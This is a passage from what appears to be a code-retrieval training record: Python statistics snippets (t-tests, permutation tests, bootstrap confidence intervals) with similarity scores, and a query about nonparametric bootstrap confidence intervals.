batches\n restricted_normals = all_samples[(all_samples['tsca_id'].isin(batches_to_pick_from)) & (all_samples['sample_type']==\"Normal\")]\n # Merge all normals from cohorts involved\n cohorts_normals_lst = []\n for cohort_involved in cohorts_involved:\n cohort_normals = restricted_normals[(restricted_normals['cohort_code']==cohort_involved)] \\\n .iloc[:num_normals_per_cohort_involved]\n cohorts_normals_lst.append(cohort_normals)\n\n cohorts_normals = pd.concat(cohorts_normals_lst)\n\n # Final PoN: batch normals + normals cohorts involved\n final_pon = pd.concat([batch_normals, cohorts_normals])\n num_normals = final_pon.shape[0]\n final_pon_name = \"PoN_%s_%s_batch_normals_%s_normals_per_cohort_%s_total\"\\\n %(tsca_id, num_normals_from_batch, num_normals_per_cohort_involved, num_normals)\n\n # Prepare for FC format\n final_pon['membership:sample_set_id'] = final_pon_name\n final_pon['sample_id'] = final_pon['entity:sample_id']\n final_pon = final_pon[['membership:sample_set_id', 'sample_id']]\n return final_pon, final_pon_name", "def attest_ind (a, b, dimension=None, printit=0, name1='Samp1', name2='Samp2',writemode='a'):\r\n if dimension == None:\r\n a = N.ravel(a)\r\n b = N.ravel(b)\r\n dimension = 0\r\n x1 = amean(a,dimension)\r\n x2 = amean(b,dimension)\r\n v1 = avar(a,dimension)\r\n v2 = avar(b,dimension)\r\n n1 = a.shape[dimension]\r\n n2 = b.shape[dimension]\r\n df = n1+n2-2\r\n svar = ((n1-1)*v1+(n2-1)*v2) / float(df)\r\n zerodivproblem = N.equal(svar,0)\r\n svar = N.where(zerodivproblem,1,svar) # avoid zero-division in 1st place\r\n t = (x1-x2)/N.sqrt(svar*(1.0/n1 + 1.0/n2)) # N-D COMPUTATION HERE!!!!!!\r\n t = N.where(zerodivproblem,1.0,t) # replace NaN/wrong t-values with 1.0\r\n probs = abetai(0.5*df,0.5,float(df)/(df+t*t))\r\n\r\n if type(t) == N.ndarray:\r\n probs = N.reshape(probs,t.shape)\r\n if probs.shape == (1,):\r\n probs = probs[0]\r\n \r\n if printit <> 0:\r\n if type(t) == N.ndarray:\r\n t = t[0]\r\n if type(probs) == N.ndarray:\r\n probs = probs[0]\r\n statname = 'Independent samples T-test.'\r\n outputpairedstats(printit,writemode,\r\n name1,n1,x1,v1,N.minimum.reduce(N.ravel(a)),\r\n N.maximum.reduce(N.ravel(a)),\r\n name2,n2,x2,v2,N.minimum.reduce(N.ravel(b)),\r\n N.maximum.reduce(N.ravel(b)),\r\n 
statname,t,probs)\r\n return\r\n return t, probs", "def test_mc_t_two_sample(self):\r\n # Verified against R's t.test() and Deducer::perm.t.test().\r\n\r\n # With numpy array as input.\r\n exp = (-0.11858541225631833, 0.90756579317867436)\r\n I = array([7.2, 7.1, 9.1, 7.2, 7.3, 7.2, 7.5])\r\n II = array([8.8, 7.5, 7.7, 7.6, 7.4, 6.7, 7.2])\r\n obs = mc_t_two_sample(I, II)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 999)\r\n self.assertCorrectPValue(0.8, 0.9, mc_t_two_sample, [I, II],\r\n p_val_idx=3)\r\n\r\n # With python list as input.\r\n exp = (-0.11858541225631833, 0.90756579317867436)\r\n I = [7.2, 7.1, 9.1, 7.2, 7.3, 7.2, 7.5]\r\n II = [8.8, 7.5, 7.7, 7.6, 7.4, 6.7, 7.2]\r\n obs = mc_t_two_sample(I, II)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 999)\r\n self.assertCorrectPValue(0.8, 0.9, mc_t_two_sample, [I, II],\r\n p_val_idx=3)\r\n\r\n exp = (-0.11858541225631833, 0.45378289658933718)\r\n obs = mc_t_two_sample(I, II, tails='low')\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 999)\r\n self.assertCorrectPValue(0.4, 0.47, mc_t_two_sample, [I, II],\r\n {'tails': 'low'}, p_val_idx=3)\r\n\r\n exp = (-0.11858541225631833, 0.54621710341066287)\r\n obs = mc_t_two_sample(I, II, tails='high', permutations=99)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 99)\r\n self.assertCorrectPValue(0.4, 0.62, mc_t_two_sample, [I, II],\r\n {'tails': 'high', 'permutations': 99}, p_val_idx=3)\r\n\r\n exp = (-2.8855783649036986, 0.99315596652421401)\r\n obs = mc_t_two_sample(I, II, tails='high', permutations=99, exp_diff=1)\r\n self.assertFloatEqual(obs[:2], exp)\r\n self.assertEqual(len(obs[2]), 99)\r\n self.assertCorrectPValue(0.55, 0.99, mc_t_two_sample, [I, II],\r\n {'tails': 'high', 'permutations': 99, 'exp_diff': 1}, p_val_idx=3)", "def permutation_test_mat(matrix,\n n_1, n_2, n_permutations,\n a00=1, a11=1, a01=0):\n n = n_1 + n_2\n pi = np.zeros(n, dtype=np.int8)\n pi[n_1:] = 1\n\n larger = 0.\n count = 0\n \n for sample_n in range(1 + n_permutations):\n count = 0.\n for i in range(n):\n for j in range(i, n):\n mij = matrix[i, j] + matrix[j, i]\n if pi[i] == pi[j] == 0:\n count += a00 * mij\n elif pi[i] == pi[j] == 1:\n count += a11 * mij\n else:\n count += a01 * mij\n if sample_n == 0:\n statistic = count\n elif statistic <= count:\n larger += 1\n\n np.random.shuffle(pi)\n\n return larger / n_permutations", "def rtest_power_and_reward_crossover():\n #define pilot cohort size\n npatients = 10\n\n #simulate drugX and drugY policies for long term in short term increments\n nstep = int(long_term/short_term)\n\n #init rewards per patient per time for drugx and drugy policies\n drugx_reward = np.zeros((nstep,npatients))\n drugy_reward = np.zeros((nstep,npatients))\n\n #init drugX simulation\n simulator = AbbcEnvironment(patients=npatients)\n #define action taken\n action = np.repeat(1, npatients)\n #main simulation loop\n for step in range(nstep):\n _, drugx_reward[step,:] = simulator.take_action(action=action, simtime=short_term)\n\n #init drugY simulation\n simulator = AbbcEnvironment(patients=npatients)\n #define action taken\n action = np.repeat(2, npatients)\n #main simulation loop\n for step in range(nstep):\n _, drugy_reward[step,:] = simulator.take_action(action=action, simtime=short_term)\n\n #calculate sample size required to resolve effect size for each simulation step.\n zalpha = 1.96 #critical zvalue for p=1-alpha/2\n zbeta = 0.8416 #critical zvalue for p=1-beta\n zsquared = 
(zalpha + zbeta)**2\n #calculate the diference in effect size\n delta = (np.mean(drugx_reward, axis=1) - np.mean(drugy_reward, axis=1))\n samplesize = np.divide((np.var(drugx_reward, axis=1) + np.var(drugx_reward, axis=1))*zsquared,delta**2)\n print(samplesize)\n print(delta)\n\n #assert max sample size is greater than 100\n assert np.max(samplesize)>100\n\n #assert max sample size at is at least 50 times the mins at short and long terms\n assert np.max(samplesize)>50*samplesize[0]\n assert np.max(samplesize)>50*samplesize[-1]\n\n #assert DrugX is better short term than DrugY\n assert delta[0]>0\n #assert DrugY is better in long term than DrugX\n assert delta[-1]<0", "def test_stat(df,ivar,tvar,equal_var=True,ddof=0):\n ivar_uniques = df[ivar].unique().shape[0]\n tvar_uniques = df[tvar].unique().shape[0]\n if tvar_uniques < 2:\n print \"Only one sample can be generated\"\n return None\n if ivar_uniques <= 10: #This the case of a categorical independant variable. We use chisquare\n ss = pd.crosstab(df[ivar],df[tvar])\n ss = (ss.T/ss.sum(axis=1)).T\n s0,s1 = ss[0].values,ss[1].values\n\n return chisquare(s1,s0,ddof=ddof)\n\n if ivar_uniques >10: #Consider using ttest\n s0 = df[ivar][df[tvar] == 0]\n s1 = df[ivar][df[tvar] == 1]\n return ttest_ind(s1,s0,equal_var=equal_var)", "def distance_matrix_permutation_test(matrix, cells, cells2=None,\r\n f=t_two_sample, tails=None, n=1000, return_scores=False,\r\n is_symmetric=True):\r\n # if matrix is symmetric convert all indices to lower trangular\r\n if is_symmetric:\r\n cells = get_ltm_cells(cells)\r\n if cells2:\r\n cells2 = get_ltm_cells(cells2)\r\n # pull out the special values\r\n special_values, other_values = \\\r\n get_values_from_matrix(matrix, cells, cells2, is_symmetric)\r\n # calc the stat and parameteric p-value for real data\r\n stat, p = f(special_values, other_values, tails)\r\n # calc for randomized matrices\r\n count_more_extreme = 0\r\n stats = []\r\n indices = range(len(matrix))\r\n for k in range(n):\r\n # shuffle the order of indices, and use those to permute the matrix\r\n permuted_matrix = permute_2d(matrix, permutation(indices))\r\n special_values, other_values = \\\r\n get_values_from_matrix(permuted_matrix, cells,\r\n cells2, is_symmetric)\r\n # calc the stat and p for a random subset (we don't do anything\r\n # with these p-values, we only use the current_stat value)\r\n current_stat, current_p = f(special_values, other_values, tails)\r\n stats.append(current_stat)\r\n if tails is None:\r\n if abs(current_stat) > abs(stat):\r\n count_more_extreme += 1\r\n elif tails == 'low':\r\n if current_stat < stat:\r\n count_more_extreme += 1\r\n elif tails == 'high':\r\n if current_stat > stat:\r\n count_more_extreme += 1\r\n\r\n # pack up the parametric stat, parametric p, and empirical p; calc the\r\n # the latter in the process\r\n result = [stat, p, count_more_extreme / n]\r\n # append the scores of the n tests if requested\r\n if return_scores:\r\n result.append(stats)\r\n return tuple(result)", "def test2Samp():\n\n sigmax = 1.0\n sigmay = 3.0\n mux = 0.0\n muy = 3.0\n nx = 10\n ny = 10\n # Update\n np.random.RandomState(0) # set seed to 0\n datax = sigmax * np.random.randn(nx) + mux\n datay = sigmay * np.random.randn(ny) + muy\n datadict = {'x': datax, 'y': datay}\n ranksums(datadict, dataLabel='Test Rank Sums (scipy)')\n ranksums(datadict, dataLabel='Test Rank Sums, Paired (scipy)', paired=True)\n ttest(datadict, dataLabel='Standard t-test (scipy)', \n textline=True, decimals=3, units='mV')\n ttest(datadict, 
dataLabel='Standard t-test (scipy), paired', paired=True,\n textline=True, decimals=3)\n (p, n) = permTS(datadict, dataLabel='R permTS')\n permutation(datadict, dataLabel='Test simple permute')\n KS(datadict, dataLabel='Test with KS')", "def test_tpms_collated_tsv(configuration_module, sample_id):\n config, _ = configuration_module\n output_dir = config[params.OUTPUT_DIR]\n check_tpms_collated_tsv(output_dir, sample_id, 2)", "def two_tailed_t_test(samples: np.ndarray, H0: float):\n empirical_mean = np.mean(samples, axis=0)\n number_samples = samples.shape[0]\n standard_error = np.std(samples, ddof=1, axis=0) / np.sqrt(number_samples)\n t_value = (empirical_mean - H0) / standard_error\n p_value = 2.0 * (1.0 - t(df=number_samples - 1).cdf(np.abs(t_value)))\n return t_value, p_value", "def run_welchs_ttest(stat1, stat2, alpha, faster):\n m1 = stat1[MEAN]\n m2 = stat2[MEAN]\n\n s1 = stat1[STDDEV]\n s2 = stat2[STDDEV]\n\n n1 = stat1[ROUNDS]\n n2 = stat2[ROUNDS]\n\n df1 = n1 - 1 # degree of freedom of stat1\n df2 = n2 - 1 # degree of freedom of stat2\n\n sample_v1 = s1**2 / n1 # biased estimated sample variance of stat1\n sample_v2 = s2**2 / n2 # biased estimated sample variance of stat2\n\n biased_variance = np.sqrt(sample_v1 + sample_v2)\n # degree of freedom\n df = (sample_v1 + sample_v2) ** 2 / (\n sample_v1**2 / (df1) + sample_v2**2 / (df2)\n )\n\n mean_delta = m1 - m2\n t_stat = mean_delta / biased_variance\n\n if faster:\n # Null hypothesis is stat1 >= stat2.\n # Alternative hypothesis is stat1 < stat2.\n p_value = t.cdf(t_stat, df)\n\n # Compute one sided confidence interval (-inf, x)\n upper_bound = mean_delta + t.ppf(1.0 - alpha, df) * biased_variance\n upper_bound = format(upper_bound, \".5f\")\n lower_bound = \"-inf\"\n else:\n # Null hypothesis is stat1 <= stat2.\n # Alternative hypothesis is stat1 > stat2.\n p_value = 1.0 - t.cdf(t_stat, df)\n\n # Compute one sided confidence interval (x, inf)\n upper_bound = \"inf\"\n lower_bound = mean_delta + t.ppf(alpha, df) * biased_variance\n lower_bound = format(lower_bound, \".5f\")\n\n return TTestResult(\n p_value=p_value,\n t_stat=t_stat,\n lower_bound=lower_bound,\n upper_bound=upper_bound,\n mean_delta=format(mean_delta, \".5f\"),\n )", "def cell_permutation(self):\n\n self.log.info(\"Begin Sample Permutation Analysis.\")\n\n # Initialize some variables.\n self.seg_analyzer.break_points(permutation=True)\n permutation_list = self.seg_analyzer.sample_names\n # cell_permutation_data_dict = defaultdict(lambda: defaultdict(list))\n odds_string = \"\"\n unique_targeted_odds_ratio_list = []\n total_targeted_odds_ratio_list = []\n total_targeted_del_odds_ratio_list = []\n total_targeted_ins_odds_ratio_list = []\n unique_targeted_ins_odds_ratio_list = []\n unique_targeted_del_odds_ratio_list = []\n\n # Run a loop for the iterations. Shuffle the list and make a copy for each loop.\n\n for i in range(int(self.args.Iteration_Count)):\n numpy.random.shuffle(permutation_list)\n shuffled_permutation_list = permutation_list\n sub_list = []\n count = 0\n\n if i % int(self.args.Prog_Check) == 0:\n self.log.info(\"Iteration {0} of {1} for Sample Permutation Analysis.\"\n .format(i, self.args.Iteration_Count))\n\n # Pybedtools keeps all temporary files until Python exits. 
This helps keep the disk clean.\n pybedtools.cleanup()\n\n # Create a list with two unique, random lists of indices.\n while count < 2:\n n = (numpy.random.choice(shuffled_permutation_list, int(self.args.Sample_Group_Size), replace=False))\n\n # Remove the first set from the list\n shuffled_permutation_list = list(set(shuffled_permutation_list).difference(n))\n sub_list.append(n)\n count += 1\n\n # Retrieve a namedtuple of the permuted samples\n d0 = self.seg_analyzer.target_intersection(sub_list[0])\n d1 = self.seg_analyzer.target_intersection(sub_list[1])\n\n # cell_permutation_data_dict[0]['del'].append([d0.total_del, d0.total_targeted_del_breakpoints,\n # d0.total_unique_del, d0.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[1]['del'].append([d1.total_del, d1.total_targeted_del_breakpoints,\n # d1.total_unique_del, d1.unique_targeted_del_breakpoints])\n # cell_permutation_data_dict[0]['ins'].append([d0.total_ins, d0.total_targeted_ins_breakpoints,\n # d0.total_unique_ins, d0.unique_targeted_ins_breakpoints])\n #\n # cell_permutation_data_dict[1]['ins'].append([d1.total_ins, d1.total_targeted_ins_breakpoints,\n # d1.total_unique_ins, d1.unique_targeted_ins_breakpoints])\n\n total_breakpoint0 = d0.total_del+d0.total_ins\n total_targeted0 = d0.total_targeted_del_breakpoints+d0.total_targeted_ins_breakpoints\n total_unique_breakpoint0 = d0.total_unique_del+d0.total_unique_ins\n total_unique_targeted0 = d0.unique_targeted_del_breakpoints+d0.unique_targeted_ins_breakpoints\n\n total_breakpoint1 = d1.total_del+d1.total_ins\n total_targeted1 = d1.total_targeted_del_breakpoints+d1.total_targeted_ins_breakpoints\n total_unique_breakpoint1 = d1.total_unique_del+d1.total_unique_ins\n total_unique_targeted1 = d1.unique_targeted_del_breakpoints+d1.unique_targeted_ins_breakpoints\n\n total_target_ratio0 = total_targeted0/total_breakpoint0\n total_target_ratio1 = total_targeted1/total_breakpoint1\n\n total_target_odds = total_target_ratio0/total_target_ratio1\n\n unique_target0 = total_unique_targeted0/total_unique_breakpoint0\n unique_target1 = total_unique_targeted1/total_unique_breakpoint1\n\n unique_target_odds = unique_target0/unique_target1\n\n try:\n del_target_odds = \\\n (d0.total_del/d0.total_targeted_del_breakpoints)/(d1.total_del/d1.total_targeted_del_breakpoints)\n except ZeroDivisionError:\n del_target_odds = 0\n try:\n udel_target_odds = \\\n (d0.unique_targeted_del_breakpoints / d0.total_unique_del) / (d1.unique_targeted_del_breakpoints /\n d1.total_unique_del)\n except ZeroDivisionError:\n udel_target_odds = 0\n try:\n ins_target_odds = \\\n (d0.total_targeted_ins_breakpoints/d0.total_ins)/(d1.total_targeted_ins_breakpoints/d1.total_ins)\n except ZeroDivisionError:\n ins_target_odds = 0\n try:\n uins_target_odds = \\\n (d0.unique_targeted_ins_breakpoints / d0.total_unique_ins) / (d1.unique_targeted_ins_breakpoints /\n d1.total_unique_ins)\n except ZeroDivisionError:\n uins_target_odds = 0\n\n total_targeted_odds_ratio_list.append(total_target_odds)\n unique_targeted_odds_ratio_list.append(unique_target_odds)\n total_targeted_del_odds_ratio_list.append(del_target_odds)\n total_targeted_ins_odds_ratio_list.append(ins_target_odds)\n unique_targeted_del_odds_ratio_list.append(udel_target_odds)\n unique_targeted_ins_odds_ratio_list.append(uins_target_odds)\n\n odds_string += \\\n \"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\" \\\n \"\\t{}\\t{}\\t{}\\t{}\\t{}\\n\"\\\n .format(total_target_odds, 
unique_target_odds, del_target_odds, udel_target_odds, ins_target_odds,\n uins_target_odds, total_breakpoint0, d0.total_del, d0.total_ins, total_targeted0,\n d0.total_targeted_del_breakpoints, d0.total_targeted_ins_breakpoints, total_unique_breakpoint0,\n d0.total_unique_del, d0.total_unique_ins, total_unique_targeted0,\n d0.unique_targeted_del_breakpoints, d0.unique_targeted_ins_breakpoints, total_breakpoint1,\n d1.total_del, d1.total_ins, total_targeted1, d1.total_targeted_del_breakpoints,\n d1.total_targeted_ins_breakpoints, total_unique_breakpoint1, d1.total_unique_del,\n d1.total_unique_ins, total_unique_targeted1, d1.unique_targeted_del_breakpoints,\n d1.unique_targeted_ins_breakpoints)\n\n odds_labels = \"Total Targeted\\tUnique Targeted\\tDel Targeted\\tUnique Del Targeted\\tIns Targeted\\t\" \\\n \"Unique Ins Targeted\\tSample_0 Total\\tSample_0 tDel\\tSample_0 tIns\\tSample_0 Targeted\\t\" \\\n \"Sample_0 tDel Targeted\\tSample_0 tIns Targeted\\tSample_0 Unique\\tSample_0 uDel\\tSample_0 uIns\\t\"\\\n \"Sample_0 uTargeted\\tSample_0 uDel Targeted\\tSample_0 uIns Targeted\\tSample_1 Total\\t\" \\\n \"Sample_1 tDel\\tSample_1 tIns\\tSample_1 Targeted\\tSample_1 tDel Targeted\\t\" \\\n \"Sample_1 tIns Targeted\\tSample_1 Unique\\tSample_1 uDel Targeted\\tSample_1 uIns Targeted\\n\"\n\n total_odds_mean = round(scipy.mean(total_targeted_odds_ratio_list), 2)\n del_odds_mean = round(scipy.mean(total_targeted_del_odds_ratio_list), 2)\n ins_odds_mean = round(scipy.mean(total_targeted_ins_odds_ratio_list), 2)\n\n unique_odds_mean = round(scipy.mean(unique_targeted_odds_ratio_list), 2)\n unique_del_odds_mean = round(scipy.mean(unique_targeted_del_odds_ratio_list), 2)\n unique_ins_odds_mean = round(scipy.mean(unique_targeted_ins_odds_ratio_list), 2)\n\n total975 = numpy.percentile(total_targeted_odds_ratio_list, 97.5, interpolation='linear')\n total25 = numpy.percentile(total_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n del975 = numpy.percentile(total_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n del25 = numpy.percentile(total_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n ins975 = numpy.percentile(total_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n ins25 = numpy.percentile(total_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_total975 = numpy.percentile(unique_targeted_odds_ratio_list, 97.5, interpolation='linear')\n unique_total25 = numpy.percentile(unique_targeted_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_del975 = numpy.percentile(unique_targeted_del_odds_ratio_list, 97.5, interpolation='linear')\n unique_del25 = numpy.percentile(unique_targeted_del_odds_ratio_list, 2.5, interpolation='linear')\n\n unique_ins975 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 97.5, interpolation='linear')\n unique_ins25 = numpy.percentile(unique_targeted_ins_odds_ratio_list, 2.5, interpolation='linear')\n\n outstring = \"Permutation Analysis Module v{}; {} Type Permutations run {}\\n\" \\\n \"Target File:\\t{}\\nSegCopy File:\\t{}\\n\\n\" \\\n \"\\tTotalOddsMean\\tUniqueOddsMean\\tTotal 97.5\\tTotal 2.5\\tUnique 97.5\\tUnique 2.5\\n\" \\\n \"Total\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nDel\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\nIns\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\" \\\n \"\\n\\n{}\\n{}\" \\\n .format(__version__, self.args.Permutation_Type, date.today().strftime(\"%Y-%m-%d\"), self.args.Target_File,\n self.args.Segment_File, total_odds_mean, unique_odds_mean, total975, total25, unique_total975,\n unique_total25, 
del_odds_mean, unique_del_odds_mean, del975, del25, unique_del975, unique_del25,\n ins_odds_mean, unique_ins_odds_mean, ins975, ins25, unique_ins975, unique_ins25, odds_labels,\n odds_string)\n\n outfile = open(\"{0}{1}_odds_ratios.txt\".format(self.args.Working_Folder, self.args.Job_Name), 'w')\n outfile.write(outstring)\n outfile.close()\n self.log.info(\"Sample Permutation Complete\")\n\n return\n #\n # ratio_mean_list = []\n # ratio_std_list = []\n # ratio_list = []\n # odds_ratio_list = []\n # outstring = \"\"\n #\n # # Format data for output file.\n # for sub_group in natsort.natsorted(cell_permutation_data_dict):\n # for key, values in cell_permutation_data_dict[sub_group].items():\n # if key == \"bp\":\n # break_point_mean = int(round(scipy.mean(values)))\n # break_point_std = round(scipy.std(values), 2)\n # break_point_median = int(round(scipy.median(values)))\n # elif key == \"intsect\":\n # intersect_mean = int(round(scipy.mean(values)))\n # intersect_std = round(scipy.std(values), 2)\n # intersect_median = int(round(scipy.median(values)))\n # elif key == \"bp/intsect\":\n # ratio_mean = scipy.mean(values)\n # ratio_std = scipy.std(values)\n # ratio_list.append(values)\n #\n # ratio_mean_list.append(ratio_mean)\n # ratio_std_list.append(ratio_std)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\t{5}\"\\\n # .format(break_point_mean, break_point_median, break_point_std, intersect_mean, intersect_median,\n # intersect_std)\n # outstring += \"\\t\"\n #\n # for l1, l2 in zip(ratio_list[0], ratio_list[1]):\n # odds_ratio_list.append(l1/l2)\n #\n # t = stats.t.interval(0.95, df=self.freq_calc_iterations-1, loc=scipy.mean(odds_ratio_list),\n # scale=scipy.std(odds_ratio_list) / numpy.sqrt(self.freq_calc_iterations))\n #\n # pval = stats.ttest_1samp(odds_ratio_list, 1)\n #\n # outstring += \"{0}\\t{1}\\t{2}\\t{3}\\t{4}\\n\"\\\n # .format(round(scipy.mean(odds_ratio_list), 2), round(scipy.std(odds_ratio_list), 2), round(t[0], 2),\n # round(t[1], 2), pval[1])\n #\n # for v in odds_ratio_list:\n # outstring += \"{0}\\n\".format(v)\n #\n # outfile.write(outstring)\n # outfile.close()\n #\n # print(\"Permutation Analysis of Samples Complete.\")\n #\n # return", "def calc_indttest_90(varx,vary):\n print('\\n>>> Using calc_ttest function!')\n \n ### Import modules\n import numpy as np\n import scipy.stats as sts\n \n ### 2-independent sample t-test\n stat,pvalue = sts.ttest_ind(varx,vary,nan_policy='omit')\n \n ### Significant at 90% confidence level\n pvalue[np.where(pvalue >= 0.1)] = np.nan\n pvalue[np.where(pvalue < 0.1)] = 1.\n pvalue[np.isnan(pvalue)] = 0.\n \n print('*Completed: Finished calc_ttest function!')\n return stat,pvalue", "def probabilistic_mutation(variables_number: int,\n mutation_chance: float) -> MutationPointsTyping:\n mutation_points = []\n for var_index in range(variables_number):\n if generate_random_float(0, 1) <= mutation_chance:\n mutation_points.append(var_index)\n return mutation_points", "def test_t(x, y, level, equal_var=True):\n if len(x) < 2 or len(y) < 2:\n return True\n s, p_value = stat.ttest_ind(x, y, 0, equal_var=equal_var)\n if np.any(p_value < level):\n return False\n else:\n return True", "def _perform_pairwise_tests(labels, dists, tail_type, num_permutations):\r\n result = []\r\n\r\n # Convert our notion of tail type into the format expected by\r\n # PyCogent.\r\n if tail_type == 'two-sided':\r\n tail_type = None\r\n\r\n # Compare each pair of distributions, keeping track of the number of actual\r\n # tests that were successfully performed so that 
we can correct for\r\n # multiple comparisons.\r\n num_tests = 0\r\n for g1_idx, (g1_label, g1_dist) in enumerate(zip(labels[:-1], dists[:-1])):\r\n for g2_label, g2_dist in zip(\r\n labels[(g1_idx + 1):], dists[(g1_idx + 1):]):\r\n if ((len(g1_dist) == 1 and len(g2_dist) == 1) or\r\n (len(g1_dist) < 1 or len(g2_dist) < 1)):\r\n # Not enough data to run the test.\r\n obs_t, param_p_val, nonparam_p_val = nan, nan, nan\r\n else:\r\n obs_t, param_p_val, _, nonparam_p_val = mc_t_two_sample(\r\n g1_dist, g2_dist, tails=tail_type,\r\n permutations=num_permutations)\r\n result.append([g1_label, g2_label, obs_t, param_p_val, None,\r\n nonparam_p_val, None])\r\n if obs_t is not nan:\r\n num_tests += 1\r\n\r\n # Correct the p-values for multiple comparisons, now that we know how many\r\n # tests succeeded.\r\n for stat in result:\r\n stat[4] = stat[3] if stat[3] is nan else min(stat[3] * num_tests, 1)\r\n stat[6] = stat[5] if stat[5] is nan else min(stat[5] * num_tests, 1)\r\n return result", "def test_perm(self):\n fun = get_problem('perm', dimension=2)\n self.assertAlmostEqual(fun(np.array([1.0, 0.5])), 0.0)" ]
[ "0.66151273", "0.6504498", "0.60829633", "0.6001584", "0.5969407", "0.5941336", "0.5911625", "0.5903978", "0.5805787", "0.5780182", "0.57714087", "0.56875885", "0.56720537", "0.56512654", "0.5612089", "0.55364573", "0.5505601", "0.55000603", "0.5491501", "0.54649895", "0.5463243", "0.54480636", "0.5421607", "0.5403361", "0.53854585", "0.53620905", "0.5341939", "0.5336638", "0.5336576", "0.531883", "0.5310258", "0.5276074", "0.5219025", "0.5210075", "0.5153671", "0.51318705", "0.5128854", "0.5082108", "0.50744444", "0.50656664", "0.5064684", "0.5064395", "0.506239", "0.50334436", "0.5032123", "0.5030216", "0.5017557", "0.50118536", "0.50031817", "0.49982548", "0.49862432", "0.49855164", "0.4984528", "0.49828437", "0.49693185", "0.4958215", "0.49562752", "0.4955817", "0.49492437", "0.49417093", "0.4933322", "0.49295682", "0.49288517", "0.49248117", "0.49236134", "0.49209735", "0.49194595", "0.4919258", "0.49149826", "0.490558", "0.489798", "0.48726717", "0.48568735", "0.48508635", "0.48396516", "0.48378855", "0.48358098", "0.48280552", "0.48266178", "0.4824697", "0.48231125", "0.48224688", "0.48218274", "0.48160177", "0.48133948", "0.48102725", "0.48013264", "0.4796622", "0.4795773", "0.4794755", "0.47904405", "0.4786908", "0.47820985", "0.4780801", "0.47734714", "0.47711176", "0.47670692", "0.47660482", "0.4764014", "0.47577173" ]
0.70762056
0
Get confidence intervals from nonparametric bootstrap.
def bootstrap_confidence_interval(
    arr, ci=0.95, n_bootstraps=2000, stat_fun="mean", random_state=None
):
    if stat_fun == "mean":

        def stat_fun(x):
            return x.mean(axis=0)

    elif stat_fun == "median":

        def stat_fun(x):
            return np.median(x, axis=0)

    elif not callable(stat_fun):
        raise ValueError("stat_fun must be 'mean', 'median' or callable.")
    n_trials = arr.shape[0]
    indices = np.arange(n_trials, dtype=int)  # BCA would be cool to have too
    rng = check_random_state(random_state)
    boot_indices = rng.choice(indices, replace=True, size=(n_bootstraps, len(indices)))
    stat = np.array([stat_fun(arr[inds]) for inds in boot_indices])
    ci = (((1 - ci) / 2) * 100, ((1 - ((1 - ci) / 2))) * 100)
    ci_low, ci_up = np.percentile(stat, ci, axis=0)
    return np.array([ci_low, ci_up])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def confidence_intervals(data):\r\n\r\n x_bar = np.nanmean(data) # Mean value\r\n s = np.nanstd(data) # Standard deviation\r\n n = len(data) # Sample size\r\n\r\n lo_conf = x_bar - (1.96 * (s / np.sqrt(n))) # Lower bound of confidence interval\r\n hi_conf = x_bar + (1.96 * (s / np.sqrt(n))) # Upper bound of confidence interval\r\n\r\n conf_range = hi_conf - lo_conf # Size of the 95% confidence interval\r\n\r\n return lo_conf, hi_conf, conf_range", "def get_bootstrap_CI(self, alpha, num_samples):\n\n # set random number generator seed\n numpy.random.seed(1)\n\n # initialize delta array\n delta = numpy.zeros(num_samples)\n\n # obtain bootstrap samples\n for i in range(num_samples):\n sample_i = numpy.random.choice(self._data, size=self._n, replace=True)\n delta[i] = sample_i.mean() - self.get_mean()\n\n # return [l, u]\n return self.get_mean() - numpy.percentile(delta, [100*(1-alpha / 2.0), 100*alpha / 2.0])", "def eeg_bootstrapCI(array,alpha):\t\n\t\n\tif len(array.shape) == 3:\n\t\tprint \"Only works on 2D bootstrapped data (ntpts x nboot)\"\n\t\tarray_low = []\n\t\tarray_high = []\n\telse:\n\t\tntpts, nboot = array.shape\n\t\t#sort along last (bootstrap) dimension\n\t\tarray_srt = np.sort(array,axis=1)\n\t\tarray_low = array_srt[:,np.round(nboot*alpha/2)-1]\n\t\tarray_high = array_srt[:,np.round(nboot*(1-alpha/2))-1]\n\t\treturn array_low,array_high", "def bootstrap_ci(x, n=300, ci=0.95):\n\n low_per = 100 * (1 - ci) / 2\n high_per = 100 * ci + low_per\n x = removena_numpy(x)\n if not len(x):\n return (np.nan, np.nan)\n bootstrap_samples = choice(a=x, size=(\n len(x), n), replace = True).mean(axis = 0)\n return np.percentile(bootstrap_samples, [low_per, high_per])", "def compute_boot_ci(window_means, n_boot=100):\n n_curves = window_means.shape[0]\n\n boot_vals = []\n for _ in range(n_boot):\n indices = np.random.randint(0, n_curves, n_curves)\n means = compute_means(window_means[indices, :])\n boot_vals.append(means)\n\n # crop the means sequences to same length\n shortest_len = min([len(means) for means in boot_vals])\n boot_vals = [means[:shortest_len] for means in boot_vals]\n boot_vals = np.array(boot_vals)\n\n ci_lower = np.percentile(boot_vals, 5, axis=0)\n ci_upper = np.percentile(boot_vals, 95, axis=0)\n return ci_lower, ci_upper", "def _ci(arr, ci=0.95, method=\"bootstrap\", n_bootstraps=2000, random_state=None):\n if method == \"bootstrap\":\n return bootstrap_confidence_interval(\n arr, ci=ci, n_bootstraps=n_bootstraps, random_state=random_state\n )\n else:\n from .parametric import 